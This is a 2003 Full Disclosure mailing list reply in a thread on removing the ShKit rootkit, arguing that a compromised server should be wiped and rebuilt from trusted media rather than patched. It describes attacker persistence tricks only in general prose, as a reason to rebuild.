Full Disclosure mailing list archives
Re: Removing ShKit Root Kit
From: "Gregory A. Gilliss" <ggilliss () netpublishing com>
Date: Mon, 22 Dec 2003 14:59:52 -0800
A dissenting view. Okay, you (finally) figured out that your machine has been compromised (and that "finally" is, upon my word, a personal reflection of how seldom anyone is paying attention, but that's another thread). Without question, IMHO, the machine's data cannot be trusted. Back it up (for the obvious reasons that even bad data is better than no data) and plow that sucker. Here's why - you don't know how I got in, or whether I can get back in, and while rebuilding a box takes time, the forensics will take longer. Suppose I rooted you using Apache (for example). Which module? Which page? Will a version upgrade fix it? Did I even *use* Apache (perhaps it only *looks* like Apache but in reality it's a Javascript trojan)? Again, the point is that you cannot be certain that anything (checksums can be calculated by people who are smart enough to find vulnerabilities in your machine - I once figured the checksum on a binary and replaced it and tripwire was none the wiser...guess why?) is valid. You can do a version (or even a release) upgrade on the box, but unless you know for certain (and you don't) which files were compromised, you cannot know for certain that the upgrade will patch the hole. That especially goes for Windows (anyone care to do a 'dir/s/a mfc42.dll' and count how many different ones live on your box). All this about the executable bit is nice, but when my cron job (that sets, runs, and unsets the 'x' bit on my trojan that you missed because you forgot to run find in the /dev directory, let alone check the crontabs) opens up a connection to my anonymous Yahoo account and mails me *your* changes, I will know more than you do about your box. And if I rootkitted you (which was the original thread) only a bootable CD (@stake, offmyserver and lnx-bbc.org are three that I personally use) will give you tools that *can* be trusted to determine just how rotten the box truly has been made. People, r00t3d means "rebuild the box from known good media". Lazy people (and I have had many, many instances of this in my personal experience) who try and "patch the box" get 0wn3d again (and again...). Plow that box! G On or about 2003.12.22 16:00:50 +0000, Brian Eckman (eckman () umn edu) said:
It always will depend on the situation. Is throwing away a few million transactions acceptable, when it might take a couple of hours or less to compare the Oracle user list against a known good list? Should you scrutinize each of those millions of transactions that occured between compromise and detection to make sure each and every one of them are legit? If doing so costs more than it is worth (define as you wish), it won't happen, and shouldn't.
-- Gregory A. Gilliss, CISSP E-mail: greg () gilliss com Computer Security WWW: http://www.gilliss.com/greg/ PGP Key fingerprint 2F 0B 70 AE 5F 8E 71 7A 2D 86 52 BA B7 83 D9 B4 14 0E 8C A3 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- re: Removing ShKit Root Kit, (continued)
- re: Removing ShKit Root Kit nicholas (Dec 22)
- RE: Removing ShKit Root Kit Schmehl, Paul L (Dec 22)
- Re: Removing ShKit Root Kit Brian Eckman (Dec 22)
- Re: Removing ShKit Root Kit Gino Thomas (Dec 22)
- Message not available
- Re: Removing ShKit Root Kit Gino Thomas (Dec 22)
- Re: Removing ShKit Root Kit Brian Eckman (Dec 22)
- Re: Removing ShKit Root Kit Nathan Bates (Dec 22)
- Re: Removing ShKit Root Kit Brian Eckman (Dec 22)
- Re: Removing ShKit Root Kit Nathan Bates (Dec 23)
- Re: Removing ShKit Root Kit Larry W. Cashdollar (Dec 22)
- Re: Removing ShKit Root Kit Brian Eckman (Dec 22)
- Re: Removing ShKit Root Kit Gregory A. Gilliss (Dec 22)
- Re: Removing ShKit Root Kit Ron DuFresne (Dec 22)
- Re: Removing ShKit Root Kit Jason (Dec 22)
- Re: Removing ShKit Root Kit Cael Abal (Dec 23)
- Re: Removing ShKit Root Kit Brian Eckman (Dec 23)
- Re: Removing ShKit Root Kit Gregory A. Gilliss (Dec 23)